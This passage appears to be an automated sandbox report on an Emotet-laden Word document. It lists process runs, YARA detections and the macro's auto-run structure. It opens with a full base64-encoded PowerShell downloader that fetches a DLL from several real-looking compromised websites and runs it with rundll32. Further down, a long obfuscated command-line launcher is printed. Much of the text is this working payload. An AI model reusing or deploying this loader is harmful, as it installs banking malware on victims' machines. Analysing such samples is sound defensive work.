MAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
                                                        Imagebase:0x13f3e0000
                                                        File size:473600 bytes
                                                        MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:13:38:42
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\System32\rundll32.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                                                        Imagebase:0xffe00000
                                                        File size:45568 bytes
                                                        MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:38:42
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Snuvw2w\V4651pz\H64C.dll AnyString
                                                        Imagebase:0xa60000
                                                        File size:44544 bytes
                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2101787109.0000000000220000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2101808244.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2102553232.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:38:47
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Snuvw2w\V4651pz\H64C.dll',#1
                                                        Imagebase:0xa60000
                                                        File size:44544 bytes
                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2113549024.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2114619642.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2113562513.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:38:53
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',vHnBlDVDvG
                                                        Imagebase:0xa60000
                                                        File size:44544 bytes
                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2123339355.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2123303691.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2123952907.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        General

                                                        Start time:13:38:57
                                                        Start date:23/01/2021
                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jqqmr\igpp.bdm',#1
                                                        Imagebase:0xa60000
                                                        File size:44544 bytes
                                                        MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2336227694.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2336212841.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2337739921.0000000010000000.00000040.00000001.sdmp, Author: Joe Security
                                                        Reputation:moderate

                                                        Disassembly

                                                        Code Analysis

                                                        Call Graph

                                                        Graph

                                                        Module: Tvh1u8793dltn9

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Tvh1u8793dltn9"

                                                        2

                                                        Attribute VB_Base = "1Normal.ThisDocument"

                                                        3

                                                        Attribute VB_GlobalNameSpace = False

                                                        4

                                                        Attribute VB_Creatable = False

                                                        5

                                                        Attribute VB_PredeclaredId = True

                                                        6

                                                        Attribute VB_Exposed = True

                                                        7

                                                        Attribute VB_TemplateDerived = True

                                                        8

                                                        Attribute VB_Customizable = True

                                                        Executed Functions
                                                        APIsMeta Information

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: IFmVwCk

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: PwelHHe

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Ga63a6ozyok1lu

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Content

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: P74x_w06z8wy

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: DOUPnxsoh

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: tmhzE

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: obTyv

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: JoHgzC

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: BYQeC

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: PpRoB

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: OfcyMA

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: VFEoD

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Mid

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Name

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Application

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: AOSGE

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: zIlZF

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: IeEnJ

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: PRawGB

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: NDNfzBJJ

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: BLbjEJvG

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: CreateObject

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: BeNoB

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: qqdsB

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Mid

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Len

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: SlFMhE

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: TtNYEBE

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Create

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Koy_r2oxzs1

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: X2yj58n39t50co

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: kxpwbBJF

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: UYxXOcIJG

                                                        Part of subcall function Cfqzsexf2_k@X1bqz0qaer43b52bf: MidB$

                                                        LineInstructionMeta Information
                                                        9

                                                        Private Sub Document_open()

                                                        10

                                                        Cfqzsexf2_k

                                                        executed
                                                        11

                                                        End Sub

                                                        Module: Twh1gb2mpd3

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "Twh1gb2mpd3"

                                                        Module: X1bqz0qaer43b52bf

                                                        Declaration
                                                        LineContent
                                                        1

                                                        Attribute VB_Name = "X1bqz0qaer43b52bf"

                                                        Executed Functions
                                                        APIsMeta Information

                                                        IFmVwCk

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        PwelHHe

                                                        MidB$

                                                        Ga63a6ozyok1lu

                                                        Content

                                                        P74x_w06z8wy

                                                        DOUPnxsoh

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        tmhzE

                                                        MidB$

                                                        obTyv

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        JoHgzC

                                                        MidB$

                                                        BYQeC

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        PpRoB

                                                        MidB$

                                                        OfcyMA

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        VFEoD

                                                        MidB$

                                                        Mid

                                                        Name

                                                        Application

                                                        AOSGE

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        zIlZF

                                                        MidB$

                                                        IeEnJ

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        PRawGB

                                                        MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: bHGFAGJ

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: OaOIEKmCA

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: DHwdFs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: mwvhyA

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: prgAO

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: imnrzOF

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UmQHurWB

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Paragraphs

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: Range

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: UBound

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: WhmkB

                                                        Part of subcall function K532dwnyk0pybrc@X1bqz0qaer43b52bf: MidB$

                                                        NDNfzBJJ

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        BLbjEJvG

                                                        MidB$

                                                        CreateObject

                                                        CreateObject("winmgmts:win32_process")

                                                        BeNoB

                                                        Paragraphs

                                                        Range

                                                        Range

                                                        UBound

                                                        qqdsB

                                                        MidB$

                                                        Mid

                                                        Len

                                                        Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAx [ sh bBTx [ sh bAGx [ sh bUAx [ sh bVAx [ sh bAtx [ sh bAHx [ sh bYAx [ sh bQQx [ sh bBSx [ sh bAGx [ sh bkAx [ sh bYQx [ sh bBCx [ sh bAEx [ sh bwAx [ sh bZQx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIgx [ sh bBUx [ sh bADx [ sh bQAx [ sh bIgx [ sh bArx [ sh bACx [ sh bIAx [ sh bSwx [ sh bBkx [ sh bADx [ sh bYAx [ sh bIgx [ sh bApx [ sh bACx [ sh bAAx [ sh bKAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bB5x [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh bAAx [ sh bLQx [ sh bBGx [ sh bACx [ sh bAAx [ sh bJwx [ sh bByx [ sh bAGx [ sh bUAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bcgx [ sh bBZx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bMAx [ sh bWQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAFx [ sh bQAx [ sh bZQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBjx [ sh bAHx [ sh bQAx [ sh bTwx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBtx [ sh bACx [ sh b4Ax [ sh bSQx [ sh bBvx [ sh bACx [ sh b4Ax [ sh bRAx [ sh bBJx [ sh bACx [ sh bcAx [ sh bKQx [ sh bAgx [ sh bACx [ sh bkAx [ sh bOwx [ sh bAgx [ sh bACx [ sh bAAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bMAx [ sh bRQx [ sh bB0x [ sh bACx [ sh bAAx [ sh bIAx [ sh bA0x [ sh bADx [ sh bIAx [ sh bOAx [ sh bAgx [ sh bACx [ sh bgAx [ sh bIAx [ sh bAgx [ sh bAFx [ sh bsAx [ sh bVAx [ sh bBZx [ sh bAHx [ sh bAAx [ sh bZQx [ sh bBdx [ sh bACx [ sh bgAx [ sh bIgx [ sh bB7x [ sh bADx [ sh bMAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bcAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bAAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bUAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bYAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bIAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bQAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bgAx [ sh bfQx [ sh bB7x [ sh bADx [ sh bEAx [ sh bfQx [ sh bAix [ sh bACx [ sh b0Ax [ sh bZgx [ sh bAnx [ sh bAEx [ sh bUAx [ sh bTQx [ sh bAux [ sh bAGx [ sh b4Ax [ sh bRQx [ sh bBUx [ sh bACx [ sh b4Ax [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bZQx [ sh bByx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAHx [ sh bQAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bUwx [ sh bBZx [ sh bAHx [ sh bMAx [ sh bJwx [ sh bAsx [ sh bACx [ sh bcAx [ sh bTQx [ sh bAnx [ sh bACx [ sh bwAx [ sh bJwx [ sh bBzx [ sh bAEx [ sh bUAx [ sh bUgx [ sh bBWx [ sh bAGx [ sh bkAx [ sh bQwx [ sh bBFx [ sh bACx [ sh bcAx [ sh bLAx [ sh bAnx [ sh bAFx [ sh bAAx 